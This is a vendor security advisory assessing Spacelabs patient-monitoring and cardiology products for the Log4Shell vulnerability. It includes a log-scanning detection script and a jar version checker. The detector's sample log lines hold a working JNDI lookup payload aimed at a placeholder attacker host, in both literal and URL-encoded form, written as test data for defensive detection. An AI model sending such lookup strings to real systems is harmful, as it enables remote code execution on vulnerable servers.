Updated: 12 January 2022
Products Covered: Spacelabs Patient Monitoring and Diagnostic Cardiology Products

Security Advisory

“Log4Shell” Vulnerability Assessment and Potential Product Impact Statement

  1. Vulnerability Overview

Spacelabs Healthcare has been made aware of a recently published security vulnerability known as “Log4Shell” (CVE-2021-44228) that was discovered in Log4j, a Java-based logging utility used in many software applications.

The Apache Log4j utility is a commonly used component for logging requests. On December 9, 2021, a vulnerability was reported that could allow a system running Apache Log4j version 2.14.1 or below to be compromised and allow an attacker to execute arbitrary code.

On December 10, 2021, NIST published a critical Common Vulnerabilities and Exposures (CVE) entry, CVE-2021-44228. More specifically, Java Naming and Directory Interface (JNDI) features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from remote servers when message lookup substitution is enabled.

  2. Risk Assessment Summary

The Log4j utility performs network lookups using the Java Naming and Directory Interface (JNDI), including through its integration with the Lightweight Directory Access Protocol (LDAP). The vulnerability takes advantage of the way Log4j interprets a log message: by design, text written in ${ } syntax is treated as a lookup, so a JNDI lookup makes Log4j resolve the embedded string as a URL and retrieve whatever that endpoint returns. If malicious text in ${ } syntax reaches a log message, the retrieved content can be executed, with elevated privileges.

Spacelabs Healthcare Patient Monitoring and Connectivity (PMC) and Diagnostic (DC) products do not use the Apache Log4j utility.

Spacelabs Healthcare’s SafeNSound 4.3.1 cloud application was discovered to be impacted and was remediated December 13, 2021. Customers who are on SafeNSound 4.3.1 do not require further follow-up. Customers using other versions of SafeNSound are not impacted.

  3. Recommendations

Spacelabs recommends the following general cybersecurity actions for an enterprise environment.

  • Implement defense-in-depth within the enterprise environment consisting of tools such as Intrusion Detection/Prevention Systems (IDS/IPS), firewalls, and network access control (NAC).
  • Configure the Intrusion Prevention System (IPS) and update the IPS rulesets to detect traffic that attempts to exploit this vulnerability.
  • Reach out to your IPS vendor directly to ensure that the software in use by your IPS/IDS system is not affected by this same vulnerability.

An IPS can reveal attempts to probe for this vulnerability, but the IPS is not able to stop the attack from reaching your applications.
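As an added illustration of the log-review side of the IPS recommendation above (this is example code, not a Spacelabs rule set), the script below flags web-server log lines that carry Log4j lookup syntax after undoing URL encoding. The log lines are constructed samples and attacker.example is a placeholder host; any ${ } lookup in a client-supplied field is reported, not only ones that spell out jndi, because legitimate clients never send that syntax.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): a benign request,
# a lookup string sent literally in the User-Agent, and the same string URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:10:01:12 +0000] "GET /login HTTP/1.1" 200 512 "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:10:02:40 +0000] "GET / HTTP/1.1" 200 88 "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:10:02:41 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "curl/7.79"
"""

JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)  # the Log4Shell lookup prefix
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")                        # any Log4j lookup token


def normalise(line):
    """Undo up to two layers of URL encoding so encoded and literal payloads compare equal."""
    for _ in range(2):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def classify(line):
    """Return 'jndi-lookup', 'lookup-syntax', or None for one log line."""
    text = normalise(line)
    if JNDI_LOOKUP.search(text):
        return "jndi-lookup"
    if ANY_LOOKUP.search(text):
        return "lookup-syntax"  # no legitimate client sends Log4j lookup syntax
    return None


def find_lookup_attempts(log_text):
    """Return (line number, verdict) for every suspicious line in the log text."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    for number, verdict in find_lookup_attempts(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```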

  4. Examination of Spacelabs Products

 4.1 Assessment of Spacelabs Products

In response to the publication of these vulnerabilities, Spacelabs has conducted an assessment to identify devices potentially at risk from this set of vulnerabilities. Please note that this information is subject to change as the situation evolves.

Patient Monitoring and Connectivity (PMC) Products

Product | Host Operating System | Impact Assessment
XprezzNet 96190 | Windows Server 2008, Windows Server 2012 R2, Windows Server 2016 | Not impacted
Intesys Clinical Suite (ICS) | Windows Server 2008, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019 | Not impacted
Intesys Clinical Suite (ICS) Clinical Access Workstations | Windows 7, Windows 8.1, Windows 10 | Not impacted
Xhibit Telemetry Receiver (XTR) 96280 | Windows Embedded Standard 7 SP1, Windows 10 IoT Enterprise Version 1809 | Not impacted
Xhibit 96102 / XC4 96501 | Windows Embedded Standard 7 SP1, Windows 10 IoT Enterprise Version 1809 | Not impacted
Bedside Monitors (Xprezzon 91393; Qube 91390; Qube Mini 91389; Ultraview SL 91367, 91369, 91370, and 91387) | VxWorks 6.6 | Not impacted
DM3, DM4 monitors | Windows CE | Not impacted

Diagnostic Cardiology (DC) Products

Product | Host Operating System | Impact Assessment
Sentinel | Windows 7, Windows 10, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019 | Not impacted
Pathfinder SL | Windows 7, Windows 10 | Not impacted
Lifescreen Pro | Windows 10 | Not impacted
Lifecard CF | No OS | Not impacted
EVO | No OS | Not impacted
Eclipse Pro | No OS | Not impacted
CardioExpress SL6A / SL12A | Embedded OS (uC/OS II V2.84) | Not impacted
CardioExpress SL18A | Embedded OS (Linux Kernel 2.6.35.3) | Not impacted
ABP (OnTrak, 90217A, 90207) | No OS | Not impacted

Safe-N-Sound (SNS)

Product | Host Operating System | Impact Assessment
Spacelabs Cloud | Varies | Not impacted
SafeNSound | Not applicable | Version >4.3.1: Not impacted. Version 4.3.1: Impacted and remediated for all customers by December 13, 2021
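A version check of the kind the assessment above depends on can be automated for a customer's own Java-based servers. The following is an added example, not Spacelabs tooling: it walks a directory tree, opens every jar, and classifies log4j-core artifacts by the Maven version recorded inside them and by whether the JndiLookup class is still present. The sample jar it builds for testing is constructed, not a real Log4j artifact; the 2.14.1-and-below threshold follows the advisory text.

```python
import io
import zipfile
from pathlib import Path

# Paths inside a log4j-core jar: the class that performs JNDI lookups, and the Maven file recording the version.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIRST_FIXED = (2, 15, 0)  # CVE-2021-44228 affects 2.14.1 and below


def parse_version(text):
    """Return (major, minor, patch) from the 'version=' line of pom.properties, or None."""
    for line in text.splitlines():
        if line.startswith("version="):
            fields = line.split("=", 1)[1].strip().split(".")[:3]
            nums = [int(f.split("-")[0]) for f in fields if f.split("-")[0].isdigit()]
            return tuple(nums + [0] * (3 - len(nums)))  # "2.0-beta9" becomes (2, 0, 0)
    return None


def assess_jar(source):
    """Classify one jar (path or raw bytes) as not-log4j, impacted, lookup-class-removed or patched."""
    source = io.BytesIO(source) if isinstance(source, (bytes, bytearray)) else source
    with zipfile.ZipFile(source) as jar:
        names = set(jar.namelist())
        if POM_PROPERTIES not in names:
            return ("not-log4j", None)
        version = parse_version(jar.read(POM_PROPERTIES).decode("utf-8", "replace"))
        if JNDI_LOOKUP_CLASS not in names:
            return ("lookup-class-removed", version)  # class deleted as a workaround
        if version is None or version < FIRST_FIXED:
            return ("impacted", version)  # an unreadable version is treated as impacted
        return ("patched", version)


def scan_tree(root):
    """Assess every *.jar under root; unreadable archives are reported, not skipped."""
    results = {}
    for jar_path in Path(root).rglob("*.jar"):
        try:
            results[str(jar_path)] = assess_jar(jar_path)
        except zipfile.BadZipFile:
            results[str(jar_path)] = ("unreadable", None)
    return results


def build_sample_jar(version, include_lookup=True):
    """Constructed stand-in jar (not a real Log4j artifact) for offline testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"version={version}\n")
        if include_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()
```

Run scan_tree on an application's install directory and treat every "impacted" or "unreadable" result as a host to follow up on.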

  5. Additional Resources

# | Resource | URL
1 | Apache Log4j Webpage | https://logging.apache.org/log4j/2.x/security.html
2 | Statement from CISA Director Easterly on “Log4j” Vulnerability | https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability
3 | CISA Known Exploited Vulnerabilities Catalog (expanded to include CVE-2021-44228) | https://www.cisa.gov/known-exploited-vulnerabilities-catalog
4 | CISA Multinational Joint Cybersecurity Advisory on Mitigating Log4Shell and Other Log4j-Related Vulnerabilities | https://www.cisa.gov/uscert/ncas/alerts/aa21-356a

Terms of Use

The information presented above is subject to change without notice. In no event will Spacelabs or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, even if Spacelabs or its suppliers have been advised of the possibility of such damages.
